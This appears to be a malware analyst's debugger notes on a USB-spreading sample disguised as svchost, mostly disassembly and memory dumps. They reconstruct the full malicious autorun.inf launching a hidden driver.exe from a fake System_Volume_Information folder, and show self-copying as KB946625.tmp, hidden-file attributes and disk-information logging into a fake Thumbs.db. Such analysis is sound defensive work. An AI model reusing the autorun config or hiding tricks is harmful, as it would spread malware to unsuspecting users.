00408991 |. 5>POP ESI
00408992 |. C>RETN
00408993 |> 5>PUSH ESI
00408994 |. E>CALL svchost.004085C0
00408999 |. 8>ADD ESP,4
0040899C |. B>MOV EAX,1
004089A1 |. 5>POP ESI
004089A2 \. C>RETN

00412893 |. C>MOV DWORD PTR DS:[42A69C],18
0041289D |. E>JMP SHORT svchost.004128DD
0041289F |> 6>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 5>PUSH ESI ; |Attributes
004128A2 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 5>PUSH EAX ; |pSecurity
004128A9 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFi>; \CreateFileA
004128B8 |. 8>MOV ESI,EAX

0012EBB8 0012ED70 |FileName = “C:\autorun.inf”
0012EBBC 40000000 |Access = GENERIC_WRITE
0012EBC0 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012EBC4 0012EBE0 |pSecurity = 0012EBE0
0012EBC8 00000004 |Mode = OPEN_ALWAYS
0012EBCC 00000080 |Attributes = NORMAL
0012EBD0 00000000 \hTemplateFile = NULL
0012EBD4 004259D5 svchost.004259D5

0012EBCC 00000080
0012EBD0 00000058 \hFile = 00000058
0012EBD4 004259D5 svchost.004259D5

004081E8 |. 0>JE svchost.00408456
004081EE |. 8>LEA EDX,DWORD PTR SS:[ESP+114]
004081F5 |. 6>PUSH 2
004081F7 |. 5>PUSH EDX
004081F8 |. F>CALL EBX ; kernel32.SetFileAttributesA
004081FA |. B>MOV ECX,41
004081FF |. 3>XOR EAX,EAX
00408201 |. 8>LEA EDI,DWORD PTR SS:[ESP+10]
00408205 |. 6>PUSH svchost.004259C8 ; ASCII “[AutoRun”
0040820A |. F>REP STOS DWORD PTR ES:[EDI]
0040820C |. 8>LEA EAX,DWORD PTR SS:[ESP+14]
00408210 |. 6>PUSH svchost.004259C4 ; ASCII “%s

00408215 |. 5>PUSH EAX

0012EC6C 73 68 65 6C 6C 5C 45 78 shell\Ex
0012EC74 70 6C 6F 72 65 5C 63 6F plore\co
0012EC7C 6D 6D 61 6E 64 3D 53 79 mmand=Sy
0012EC84 73 74 65 6D 5F 56 6F 6C stem_Vol
0012EC8C 75 6D 65 5F 49 6E 66 6F ume_Info
0012EC94 72 6D 61 74 69 6F 6E 5C rmation\
0012EC9C 5F 72 65 73 74 6F 72 65 _restore
0012ECA4 7B 32 36 38 36 34 43 31 {26864C1
0012ECAC 37 2D 31 38 44 44 2D 34 7-18DD-4
0012ECB4 35 36 31 2D 38 34 31 30 561-8410
0012ECBC 7D 5C 64 72 69 76 65 72 }\driver
0012ECC4 2E 65 78 65 20 2D 65 0A .exe -e.

0012E7D4 00000058 |hFile = 00000058
0012E7D8 0012E7F4 |Buffer = 0012E7F4
0012E7DC 0000012D |nBytesToWrite = 12D (301.)
0012E7E0 0012EBFC |pBytesWritten = 0012EBFC
0012E7E4 00000000 \pOverlapped = NULL

00412C72 |. 8>|LEA EAX,DWORD PTR SS:[EBP-414]
00412C78 |. 2>|SUB EDI,EAX
00412C7A |. 8>|LEA EAX,DWORD PTR SS:[EBP-C]
00412C7D |. 6>|PUSH 0 ; /pOverlapped = NULL
00412C7F |. 5>|PUSH EAX ; |pBytesWritten
00412C80 |. 8>|LEA EAX,DWORD PTR SS:[EBP-414] ; |
00412C86 |. 5>|PUSH EDI ; |nBytesToWrite
00412C87 |. 5>|PUSH EAX ; |Buffer
00412C88 |. 8>|MOV EAX,DWORD PTR DS:[EBX] ; |
00412C8A |. F>|PUSH DWORD PTR DS:[EAX+ESI] ; |hFile
00412C8D |. F>|CALL DWORD PTR DS:[<&KERNEL32.WriteFi>; \WriteFile
00412C93 |. 8>|TEST EAX,EAX

0012E7F4 5B 41 75 74 6F 52 75 6E [AutoRun
0012E7FC 0D 0A 73 68 65 6C 6C 65 ..shelle
0012E804 78 65 63 75 74 65 3D 53 xecute=S
0012E80C 79 73 74 65 6D 5F 56 6F ystem_Vo
0012E814 6C 75 6D 65 5F 49 6E 66 lume_Inf
0012E81C 6F 72 6D 61 74 69 6F 6E ormation
0012E824 5C 5F 72 65 73 74 6F 72 \_restor
0012E82C 65 7B 32 36 38 36 34 43 e{26864C
0012E834 31 37 2D 31 38 44 44 2D 17-18DD-
0012E83C 34 35 36 31 2D 38 34 31 4561-841
0012E844 30 7D 5C 64 72 69 76 65 0}\drive
0012E84C 72 2E 65 78 65 20 2D 6F r.exe -o
0012E854 0D 0A 73 68 65 6C 6C 5C ..shell\
0012E85C 4F 70 65 6E 5C 63 6F 6D Open\com
0012E864 6D 61 6E 64 3D 53 79 73 mand=Sys
0012E86C 74 65 6D 5F 56 6F 6C 75 tem_Volu
0012E874 6D 65 5F 49 6E 66 6F 72 me_Infor
0012E87C 6D 61 74 69 6F 6E 5C 5F mation\_
0012E884 72 65 73 74 6F 72 65 7B restore{
0012E88C 32 36 38 36 34 43 31 37 26864C17
0012E894 2D 31 38 44 44 2D 34 35 -18DD-45
0012E89C 36 31 2D 38 34 31 30 7D 61-8410}
0012E8A4 5C 64 72 69 76 65 72 2E \driver.
0012E8AC 65 78 65 20 2D 6F 0D 0A exe -o..
0012E8B4 73 68 65 6C 6C 3D 4F 70 shell=Op
0012E8BC 65 6E 0D 0A 73 68 65 6C en..shel
0012E8C4 6C 5C 45 78 70 6C 6F 72 l\Explor
0012E8CC 65 5C 63 6F 6D 6D 61 6E e\comman
0012E8D4 64 3D 53 79 73 74 65 6D d=System
0012E8DC 5F 56 6F 6C 75 6D 65 5F _Volume_
0012E8E4 49 6E 66 6F 72 6D 61 74 Informat
0012E8EC 69 6F 6E 5C 5F 72 65 73 ion\_res
0012E8F4 74 6F 72 65 7B 32 36 38 tore{268
0012E8FC 36 34 43 31 37 2D 31 38 64C17-18
0012E904 44 44 2D 34 35 36 31 2D DD-4561-
0012E90C 38 34 31 30 7D 5C 64 72 8410}\dr
0012E914 69 76 65 72 2E 65 78 65 iver.exe
0012E91C 20 2D 65 0D 0A 02 00 00 -e…..
[AutoRun
shellexecute=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -o
shell\Open\command=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -o
shell=Open
shell\Explore\command=System_Volume_Information\_restore{26864C17-18DD-4561-8410}\driver.exe -e

 

004126DD |> 5>PUSH ESI
004126DE |> 6>PUSH 0 ; |Flags = 0
004126E0 |. F>PUSH DWORD PTR DS:[42BE60] ; |hHeap = 008B0000 ; this address is the heap area of the construction of autorun.inf
004126E6 |. F>CALL DWORD PTR DS:[<&KERNEL32.HeapFree>; \HeapFree
004126EC |> 5>POP ESI

00408401 |. 83>ADD ESP,18
00408404 |. F3>REP STOS DWORD PTR ES:[EDI]
00408406 |. 8D>LEA EAX,DWORD PTR SS:[ESP+10]
0040840A |. 68>PUSH svchost.00425830 ; ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0040840F |. 50 PUSH EAX
00408410 |. E8>CALL svchost.004130C0
00408415 |. 8D>LEA EDI,DWORD PTR SS:[ESP+18]

0012EC54 0012EC6C ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0012EC58 00425830 ASCII “CLSID={645FF040-5081-101B-9F08-00AA002F954E}

0012EC5C 0012F7D0

0012E7D8 00000058 |hFile = 00000058
0012E7DC 0012E7F8 |Buffer = 0012E7F8
0012E7E0 00000041 |nBytesToWrite = 41 (65.)
0012E7E4 0012EC00 |pBytesWritten = 0012EC00
0012E7E8 00000000 \pOverlapped = NULL
0012E7EC 0000003F

0012E7F8 5B 2E 53 68 65 6C 6C 43 [.ShellC
0012E800 6C 61 73 73 49 6E 66 6F lassInfo
0012E808 5D 0D 0A 43 4C 53 49 44 ]..CLSID
0012E810 3D 7B 36 34 35 46 46 30 ={645FF0
0012E818 34 30 2D 35 30 38 31 2D 40-5081-
0012E820 31 30 31 42 2D 39 46 30 101B-9F0
0012E828 38 2D 30 30 41 41 30 30 8-00AA00
0012E830 32 46 39 35 34 45 7D 0D 2F954E}.

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
00408992 |. C3 RETN
00408993 |> 56 PUSH ESI
00408994 |. E8>CALL svchost.004085C0 ; UsbDriver.tlb payload
00408999 |. 83>ADD ESP,4
0040899C |. B8>MOV EAX,1
004089A1 |. 5E POP ESI
004089A2 \. C3 RETN

Next Payload is usbdriver.tlb

0012EC5C 0012EC6C ASCII “C:\Documents and Settings\VICTOR\Desktop\UsbDriver.tlb”
0012EC60 00425A34 ASCII “%s\UsbDriver.tlb”
0012EC64 0012EC6C ASCII “C:\Documents and Settings\VICTOR\Desktop\UsbDriver.tlb”
0012EC68 0012EE9C ASCII “C:”

Proceeding to drive.tlb payload and preps :

004096ED |. 8D>|LEA EDX,DWORD PTR SS:[ESP+128]
004096F4 |. F3>|REP STOS DWORD PTR ES:[EDI]
004096F6 |. 68>|PUSH svchost.00426084 ; ASCII “KB946625.tmp”
004096FB |. 52 |PUSH EDX
004096FC |. 8D>|LEA EAX,DWORD PTR SS:[ESP+43C]
00409703 |. 68>|PUSH svchost.00426108 ; ASCII “%s\%s”
00409708 |. 50 |PUSH EAX
0012EE78 0012F2BC ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\KB946625.tmp”
0012EE7C 00426108 ASCII “%s\%s”

00409736 |. 8D>|LEA EDI,DWORD PTR SS:[ESP+740] ; points to Stack address=0012F5C8
EDI=0012F3C0, (ASCII “C:\Documents and Settings\VICTOR\Desktop\drive.tlb”)

0040973D |. 68>|PUSH svchost.00425FD8 ; ASCII “Shared.dll”
00409742 |. F3>|REP STOS DWORD PTR ES:[EDI]
00409744 |. 8D>|LEA EAX,DWORD PTR SS:[ESP+640]
0040974B |. 8D>|LEA ECX,DWORD PTR SS:[ESP+744]
00409752 |. 50 |PUSH EAX

0012EE78 0012F5C8 ASCII “C:\Documents and Settings\VICTOR\Desktop\Shared.dll”
0012EE7C 00426108 ASCII “%s\%s”

0012EE78 0012EFB0 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\drive.tlb”
0012EE7C 00426108 ASCII “%s\%s”
0012EE80 0012EFB0 ASCII “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\drive.tlb”
0012EE84 00426010 ASCII “drive.tlb”

00409989 |. 51 |PUSH ECX ; /pLocaltime
0040998A |. FF>|CALL DWORD PTR DS:[<&KERNEL32.GetLocalT>; \GetLocalTime
00409990 |. BF>|MOV EDI,svchost.0042A10C

0012EE84 0012EEE8 \pLocaltime = 0012EEE8

Manipulation Functions :
0040CCA0 /$ 8B>MOV EAX,DWORD PTR SS:[ESP+C]
0040CCA4 |. 53 PUSH EBX
0040CCA5 |. 8B>MOV EBX,ECX
0040CCA7 |. 55 PUSH EBP
0040CCA8 |. 8B>MOV EBP,DWORD PTR SS:[ESP+10]
0040CCAC |. 33>XOR ECX,ECX
0040CCAE |. 3B>CMP EBP,ECX
0040CCB0 |. 89>MOV DWORD PTR DS:[EBX+38],ECX
0040CCB3 |. 89>MOV DWORD PTR DS:[EBX+3C],ECX
0040CCB6 |. C7>MOV DWORD PTR DS:[EBX+40],20
0040CCBD |. 89>MOV DWORD PTR DS:[EBX+44],EAX
0040CCC0 |. 0F>JE svchost.0040CD56
0040CCC6 |. 83>AND EAX,6
0040CCC9 |. 3C>CMP AL,6
0040CCCB |. 0F>JE svchost.0040CD56
0040CCD1 |. 3B>CMP EBP,ECX
0040CCD3 |. 8B>MOV EAX,EBP
0040CCD5 |. 7D>JGE SHORT svchost.0040CCD9
0040CCD7 |. 33>XOR EAX,EAX
0040CCD9 |> 56 PUSH ESI
0040CCDA |. 57 PUSH EDI
0040CCDB |. 50 PUSH EAX
0040CCDC |. E8>CALL svchost.004125C6
0040CCE1 |. 8B>MOV ESI,DWORD PTR SS:[ESP+18]
0040CCE5 |. 8B>MOV ECX,EBP
0040CCE7 |. 8B>MOV EDX,ECX
0040CCE9 |. 8B>MOV EDI,EAX
0040CCEB |. C1>SHR ECX,2
0040CCEE |. F3>REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
0040CCF0 |. 8B>MOV ECX,EDX
0040CCF2 |. 83>ADD ESP,4
0040CCF5 |. 83>AND ECX,3
0040CCF8 |. F3>REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
0040CCFA |. 8D>LEA ECX,DWORD PTR DS:[EAX+EBP]
0040CCFD |. 5F POP EDI
0040CCFE |. 89>MOV DWORD PTR DS:[EBX+3C],ECX
0040CD01 |. 8A>MOV CL,BYTE PTR DS:[EBX+44]
0040CD04 |. F6>TEST CL,4
0040CD07 |. 5E POP ESI
0040CD08 |. 75>JNZ SHORT svchost.0040CD19
0040CD0A |. 8B>MOV EDX,DWORD PTR DS:[EBX+C]
0040CD0D |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD0F |. 8B>MOV ECX,DWORD PTR DS:[EBX+1C]
0040CD12 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD14 |. 8B>MOV EDX,DWORD PTR DS:[EBX+2C]
0040CD17 |. 89>MOV DWORD PTR DS:[EDX],EBP
0040CD19 |> F6>TEST BYTE PTR DS:[EBX+44],2
0040CD1D |. 75>JNZ SHORT svchost.0040CD49
0040CD1F |. 8B>MOV ECX,DWORD PTR DS:[EBX+10]
0040CD22 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD24 |. 8B>MOV EDX,DWORD PTR DS:[EBX+20]
0040CD27 |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD29 |. 8B>MOV ECX,DWORD PTR DS:[EBX+30]
0040CD2C |. 89>MOV DWORD PTR DS:[ECX],EBP
0040CD2E |. 8B>MOV EDX,DWORD PTR DS:[EBX+1C]
0040CD31 |. 83>CMP DWORD PTR DS:[EDX],0
0040CD34 |. 75>JNZ SHORT svchost.0040CD49
0040CD36 |. 8B>MOV ECX,DWORD PTR DS:[EBX+C]
0040CD39 |. 89>MOV DWORD PTR DS:[ECX],EAX
0040CD3B |. 8B>MOV EDX,DWORD PTR DS:[EBX+1C]
0040CD3E |. 89>MOV DWORD PTR DS:[EDX],EAX
0040CD40 |. 8B>MOV EAX,DWORD PTR DS:[EBX+2C]
0040CD43 |. C7>MOV DWORD PTR DS:[EAX],0
0040CD49 |> 8B>MOV EAX,DWORD PTR DS:[EBX+44]
0040CD4C |. 5D POP EBP
0040CD4D |. 0C>OR AL,1
0040CD4F |. 89>MOV DWORD PTR DS:[EBX+44],EAX
0040CD52 |. 5B POP EBX
0040CD53 |. C2>RETN 0C
0040CD56 |> 8B>MOV EDX,DWORD PTR DS:[EBX+C]
0040CD59 |. 5D POP EBP
0040CD5A |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD5C |. 8B>MOV EAX,DWORD PTR DS:[EBX+1C]
0040CD5F |. 89>MOV DWORD PTR DS:[EAX],ECX
0040CD61 |. 8B>MOV EDX,DWORD PTR DS:[EBX+2C]
0040CD64 |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD66 |. 8B>MOV EAX,DWORD PTR DS:[EBX+10]
0040CD69 |. 89>MOV DWORD PTR DS:[EAX],ECX
0040CD6B |. 8B>MOV EDX,DWORD PTR DS:[EBX+20]
0040CD6E |. 89>MOV DWORD PTR DS:[EDX],ECX
0040CD70 |. 8B>MOV EAX,DWORD PTR DS:[EBX+30]
0040CD73 |. 5B POP EBX
0040CD74 |. 89>MOV DWORD PTR DS:[EAX],ECX

resulting in :

008B08F8 70 00 05 00 EC 07 20 00 p….. .
008B0900 4C 43 5F 43 4F 4C 4C 41 LC_COLLA
008B0908 54 45 3D 43 3B 4C 43 5F TE=C;LC_
008B0910 43 54 59 50 45 3D 43 3B CTYPE=C;
008B0918 4C 43 5F 4D 4F 4E 45 54 LC_MONET
008B0920 41 52 59 3D 43 3B 4C 43 ARY=C;LC
008B0928 5F 4E 55 4D 45 52 49 43 _NUMERIC
008B0930 3D 43 3B 4C 43 5F 54 49 =C;LC_TI
008B0938 4D 45 3D 43 00 F0 AD BA ME=C….
008B0940 0D F0 AD BA 0D F0 AD BA ……..
0012EC3C 008B0900 ASCII “LC_COLLATE=C;LC_CTYPE=C;LC_MONETARY=C;LC_NUMERIC=C;LC_TIME=C”

00416180 |> 8B>/MOV EAX,DWORD PTR DS:[ECX]
00416182 |. BA>|MOV EDX,7EFEFEFF
00416187 |. 03>|ADD EDX,EAX
00416189 |. 83>|XOR EAX,FFFFFFFF
0041618C |. 33>|XOR EAX,EDX
0041618E |. 83>|ADD ECX,4
00416191 |. A9>|TEST EAX,81010100
00416196 |.^74>|JE SHORT svchost.00416180
00416198 |. 8B>|MOV EAX,DWORD PTR DS:[ECX-4]
0041619B |. 84>|TEST AL,AL

Decryption loop above.

0012EE7C 0012F9D8 |ExistingFileName = “C:\Documents and Settings\VICTOR\Desktop\svchost.eVe”
0012EE80 0012F2BC |NewFileName = “C:\System_Volume_Information\_restore{26864C17-18DD-4561-8410}\KB946625.tmp”
0012EE84 00000000 \FailIfExists = FALSE

00409F3C |. 8B>|MOV ESI,DWORD PTR DS:[<&KERNEL32.CopyFi>; kernel32.CopyFileA
00409F42 |. 8D>|LEA EDX,DWORD PTR SS:[ESP+434]
00409F49 |. 53 |PUSH EBX ; /FailIfExists
00409F4A |. 8D>|LEA EAX,DWORD PTR SS:[ESP+B54] ; |
00409F51 |. 52 |PUSH EDX ; |NewFileName
00409F52 |. 50 |PUSH EAX ; |ExistingFileName
00409F53 |. FF>|CALL ESI ; \CopyFileA
00409F55 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+434]
00409F5C |. 6A>|PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
00409F5E |. 51 |PUSH ECX ; |FileName
00409F5F |. FF>|CALL EBP ; \SetFileAttributesA
00409F61 |. 8D>|LEA EDX,DWORD PTR SS:[ESP+740]
00409F68 |. 53 |PUSH EBX
00409F69 |. 52 |PUSH EDX

New function further down ;

00409FC4 |> A0>|MOV AL,BYTE PTR DS:[42A274]
00409FC9 |. 8A>|MOV CL,BYTE PTR DS:[42A275]
00409FCF |. 8A>|MOV DL,BYTE PTR DS:[42A276]
00409FD5 |. 89>|MOV DWORD PTR SS:[ESP+1C],EBX
00409FD9 |. 88>|MOV BYTE PTR SS:[ESP+1C],AL

0012EE74 0012EEA4 |RootPathName = “C:\”
0012EE78 0012EEBC |pSectorsPerCluster = 0012EEBC
0012EE7C 0012EEC0 |pBytesPerSector = 0012EEC0
0012EE80 0012EEC4 |pFreeClusters = 0012EEC4
0012EE84 0012EEE0 \pClusters = 0012EEE0
0012EE88 7C822CFB RETURN to kernel32.GetDriveTypeA

00409FF2 |. 51 |PUSH ECX ; |pFreeClusters
00409FF3 |. 8D>|LEA EAX,DWORD PTR SS:[ESP+3C] ; |
00409FF7 |. 52 |PUSH EDX ; |pBytesPerSector
00409FF8 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+28] ; |
00409FFC |. 50 |PUSH EAX ; |pSectorsPerCluster
00409FFD |. 51 |PUSH ECX ; |RootPathName
00409FFE |. 88>|MOV BYTE PTR SS:[ESP+33],BL ; |
0040A002 |. FF>|CALL DWORD PTR DS:[<&KERNEL32.GetDiskFr>; \GetDiskFreeSpaceA
0040A008 |. 8B>|MOV EDX,DWORD PTR SS:[ESP+34]

0040A039 |> 68>|PUSH svchost.0042A274 ; ASCII “C:\Documents and Settings\VICTOR\Desktop\log”
0040A03E |. E8>|CALL svchost.0040D230
0040A043 |. 8B>|MOV ECX,DWORD PTR SS:[ESP+38]
0040A047 |. 83>|ADD ESP,4
0040A04A |. 0F>|IMUL ECX,DWORD PTR SS:[ESP+38]
0040A04F |. 0F>|IMUL ECX,DWORD PTR SS:[ESP+3C]
0040A054 |. 8D>|LEA EDI,DWORD PTR SS:[ESP+948]
0040A05B |. 68>|PUSH svchost.00426060 ; ASCII “_restore{26864C17-18DD-4561-8411}”
0040A060 |. 8D>|LEA EBP,DWORD PTR DS:[EAX+ECX+F3800000]
0040A067 |. B9>|MOV ECX,41
0040A06C |. 33>|XOR EAX,EAX
0040A06E |. 8D>|LEA EDX,DWORD PTR SS:[ESP+18]
0040A072 |. F3>|REP STOS DWORD PTR ES:[EDI]
0040A074 |. 68>|PUSH svchost.00426020 ; ASCII “System_Volume_Information”
0040A079 |. 52 |PUSH EDX
0040A07A |. 8D>|LEA EAX,DWORD PTR SS:[ESP+954]

0012EE78 0012F0B4 ASCII “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EE7C 00426108 ASCII “%s\%s”
0012EE80 0012F4C4 ASCII “C:\Documents and Settings\VICTOR\Desktop”
0012EE84 00425FE4 ASCII “list.tlb”

0012EB14 0012F0B4 |FileName = “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EB18 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0012EB1C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012EB20 0012EB3C |pSecurity = 0012EB3C
0012EB24 00000004 |Mode = OPEN_ALWAYS
0012EB28 00000080 |Attributes = NORMAL
0012EB2C 00000000 \hTemplateFile = NULL
0012EB30 00425D33 svchost.00425D33

0041289D |. EB>JMP SHORT svchost.004128DD
0041289F |> 6A>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 56 PUSH ESI ; |Attributes
004128A2 |. FF>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8D>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 50 PUSH EAX ; |pSecurity
004128A9 |. FF>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. FF>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. FF>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. FF>CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004128B8 |. 8B>MOV ESI,EAX

EBX=00000000
EAX=008B1FD1, (ASCII “C:\Documents and Settings\VICTOR\Desktop\log\Thumbs.db”)
0012EBB0 0012ED5C |Arg1 = 0012ED5C
0012EBB4 00000104 |Arg2 = 00000104
0012EBB8 00428DF0 \Arg3 = 00428DF0

00408E53 |> 55 |/PUSH EBP ; /Arg3
00408E54 |. 8D>||LEA ECX,DWORD PTR SS:[ESP+1A4] ; |
00408E5B |. 68>||PUSH 104 ; |Arg2 = 00000104
00408E60 |. 51 ||PUSH ECX ; |Arg1
00408E61 |. E8>||CALL svchost.00413F16 ; \svchost.00413F16

00412A34 |> 8D>LEA EAX,DWORD PTR SS:[EBP-C]
00412A37 |. 6A>PUSH 0 ; /pOverlapped = NULL
00412A39 |. 50 PUSH EAX ; |pBytesRead
00412A3A |. 8B>MOV EAX,DWORD PTR DS:[EBX] ; |
00412A3C |. FF>PUSH DWORD PTR SS:[EBP+10] ; |BytesToRead
00412A3F |. 51 PUSH ECX ; |Buffer
00412A40 |. FF>PUSH DWORD PTR DS:[EAX+ESI] ; |hFile
00412A43 |. FF>CALL DWORD PTR DS:[<&KERNEL32.ReadFile>] ; \ReadFile

00414423 |> F7>NEG EAX
00414425 |. 1B>SBB EAX,EAX
00414427 |. 83>AND EAX,10
0041442A |. 83>ADD EAX,10
0041442D |. 09>OR DWORD PTR DS:[ESI+C],EAX
00414430 |. 83>AND DWORD PTR DS:[ESI+4],0
00414434 |> 83>OR EAX,FFFFFFFF
00414437 |. 5E POP ESI
00414438 \. C3 RETN

0012E748 00000054 |hFile = 00000054
0012E74C 008B2170 |Buffer = 008B2170
0012E750 0000000B |nBytesToWrite = B (11.)
0012E754 0012EB70 |pBytesWritten = 0012EB70
0012E758 00000000 \pOverlapped = NULL

00412CE5 |> 8D>LEA ECX,DWORD PTR SS:[EBP-C]
00412CE8 |. 57 PUSH EDI ; /pOverlapped
00412CE9 |. 51 PUSH ECX ; |pBytesWritten
00412CEA |. FF>PUSH DWORD PTR SS:[EBP+10] ; |nBytesToWrite
00412CED |. FF>PUSH DWORD PTR SS:[EBP+C] ; |Buffer
00412CF0 |. FF>PUSH DWORD PTR DS:[EAX] ; |hFile
00412CF2 |. FF>CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile

008B2170 5C 54 68 75 6D 62 73 2E \Thumbs.
008B2178 64 62 0A BA 0D F0 AD BA db……
008B2180 0D F0 AD BA 0D F0 AD BA ……..

Contents of Thumbs.db :

2011-11-11 6:25:50..Name : ..Seri : 747697999..Tota : 2135797760..Free : 3112579072…

Reference :
[Date : Time : Serial : Total Root Disk Size : Free Space :]

0012EE80 0012F0B4 |FileName = “C:\Documents and Settings\VICTOR\Desktop\list.tlb”
0012EE84 00000006 \FileAttributes = HIDDEN|SYSTEM
0012EE88 7C822CFB RETURN to kernel32.GetDriveTypeA

0040A112 |. 8D>|LEA ECX,DWORD PTR SS:[ESP+22C]
0040A119 |. 6A>|PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040A11B |. 51 |PUSH ECX ; |FileName
0040A11C |. FF>|CALL DWORD PTR DS:[<&KERNEL32.SetFileAt>; \SetFileAttributesA
0040A122 |> 8D>|LEA EDX,DWORD PTR SS:[ESP+22C]

0012EBFC 00000054 |hFile = 00000054
0012EC00 008B1FD0 |Buffer = 008B1FD0
0012EC04 00001000 |BytesToRead = 1000 (4096.)
0012EC08 0012EC1C |pBytesRead = 0012EC1C
0012EC0C 00000000 \pOverlapped = NULL

Contents of list.tlb :

\Thumbs.db.

 
Next Focus cab file :

0040A5A1 > 89>MOV DWORD PTR SS:[EBP-4],ESI
0040A5A4 . 39>CMP DWORD PTR DS:[42A580],ESI
0040A5AA . 75>JNZ SHORT svchost.0040A5F2
0040A5AC . C7>MOV DWORD PTR DS:[42A580],1
0040A5B6 . E8>CALL svchost.0040EC20 ; To cab through SEH-II
0040A5BB . 89>MOV DWORD PTR DS:[42A580],ESI
0040A5C1 . 68>PUSH 1B7740 ; /Timeout = 1800000. ms
0040A5C6 . FF>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040A5CC . C7>MOV DWORD PTR SS:[EBP-4],-1
0040A5D3 .^EB>JMP SHORT svchost.0040A5A1
0040A5D5 . C7>MOV DWORD PTR DS:[42A580],0
0040A5DF . 68>PUSH 0EA60 ; /Timeout = 60000. ms
0040A5E4 . FF>CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040A5EA . B8>MOV EAX,svchost.0040A5F0
0040A5EF . C3 RETN

0012F588 0012F5FC |RootPathName = “C:\”
0012F58C 0012F624 |pSectorsPerCluster = 0012F624
0012F590 0012F61C |pBytesPerSector = 0012F61C
0012F594 0012F618 |pFreeClusters = 0012F618
0012F598 0012F760 \pClusters = 0012F760
0012F59C 7C822CFB RETURN to kernel32.GetDriveTypeA

0040ECD0 |. 5>PUSH EAX ; /pClusters
0040ECD1 |. 8>LEA EDX,DWORD PTR SS:[ESP+84] ; |
0040ECD8 |. 5>PUSH ECX ; |pFreeClusters
0040ECD9 |. 8>LEA EAX,DWORD PTR SS:[ESP+90] ; |
0040ECE0 |. 5>PUSH EDX ; |pBytesPerSector
0040ECE1 |. 8>LEA ECX,DWORD PTR SS:[ESP+6C] ; |
0040ECE5 |. 5>PUSH EAX ; |pSectorsPerCluster
0040ECE6 |. 5>PUSH ECX ; |RootPathName
0040ECE7 |. C>MOV BYTE PTR SS:[ESP+58],0 ; |
0040ECEC |. 6>MOV WORD PTR SS:[ESP+59],BP ; |
0040ECF1 |. 8>MOV DWORD PTR SS:[ESP+84],EBP ; |
0040ECF8 |. 8>MOV DWORD PTR SS:[ESP+78],EBP ; |
0040ECFC |. C>MOV DWORD PTR SS:[ESP+98],104 ; |
0040ED07 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetDiskFre>; \GetDiskFreeSpaceA
0040ED0D |. 8>MOV EDX,DWORD PTR SS:[ESP+88]
0040ED14 |. 0>IMUL EDX,DWORD PTR SS:[ESP+80]
0040ED1C |. 0>IMUL EDX,DWORD PTR SS:[ESP+7C]
0040ED21 |. 8>CMP EDX,0C800000 ; cmp to this value
0040ED27 |. 0>JNB svchost.0040EDD2 ; jump to cab I
0040ED2D |. 8>MOV EAX,DWORD PTR SS:[ESP+28]
0040EDD8 |. E>CALL svchost.00413E46
0040EDDD |. 8>ADD ESP,8
0040EDE0 |. 8>CMP EAX,-1
0040EDE3 |. 7>JNZ SHORT svchost.0040EDFE
0040EDE5 |. 5>PUSH EBP ; /pSecurity
0040EDE6 |. 6>PUSH svchost.0042A170 ; |Path = “C:\WINDOWS\log”
0040EDEB |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateDire>; \CreateDirectoryA
0040EDF1 |. 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040EDF3 |. 6>PUSH svchost.0042A170 ; |FileName = “C:\WINDOWS\log”
0040EDF8 |. F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
0040EDFE |> 8>LEA EAX,DWORD PTR SS:[ESP+10]
0040EE02 |. 5>PUSH EAX ; /pLocaltime
0040EE03 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime

0040EE02 |. 5>PUSH EAX ; /pLocaltime = 0012F5AC
0040EE03 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime
